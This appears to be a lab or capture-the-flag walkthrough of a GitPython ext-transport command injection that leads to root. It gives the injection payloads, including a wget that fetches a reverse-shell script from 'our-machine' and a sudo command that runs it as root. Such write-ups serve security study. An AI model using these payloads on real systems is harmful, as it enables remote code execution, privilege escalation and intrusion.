Table of Contents
About
Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments. This is only relevant when enabling the ext transport protocol.
- Ext Transport protocol
References
Walkthrough
Narrative:
GitPython version 3.1.29, which is vulnerable to this CVE:
An unprivileged user has sudo permissions to run a python script, which clones a remote repository:
prod@editorial:~$ sudo -l
Matching Defaults entries for prod on editorial:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User prod may run the following commands on editorial:
(root) /usr/bin/python3
/opt/internal_apps/clone_changes/clone_prod_change.py *Contents of /opt/internal_apps/clone_changes/clone_prod_change.py:
#!/usr/bin/python3
import os
import sys
from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])Exploiting with the original PoC:
'ext::sh -c touch% /tmp/pwned'We can then, set our own arguments:
'ext::sh -c wget% http://our-machine/reverse-shell.sh% >% /tmp/r.sh'And so it builds like this:
# Executing a Reverse Shell, as root:
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/r.sh'Proof of concept:
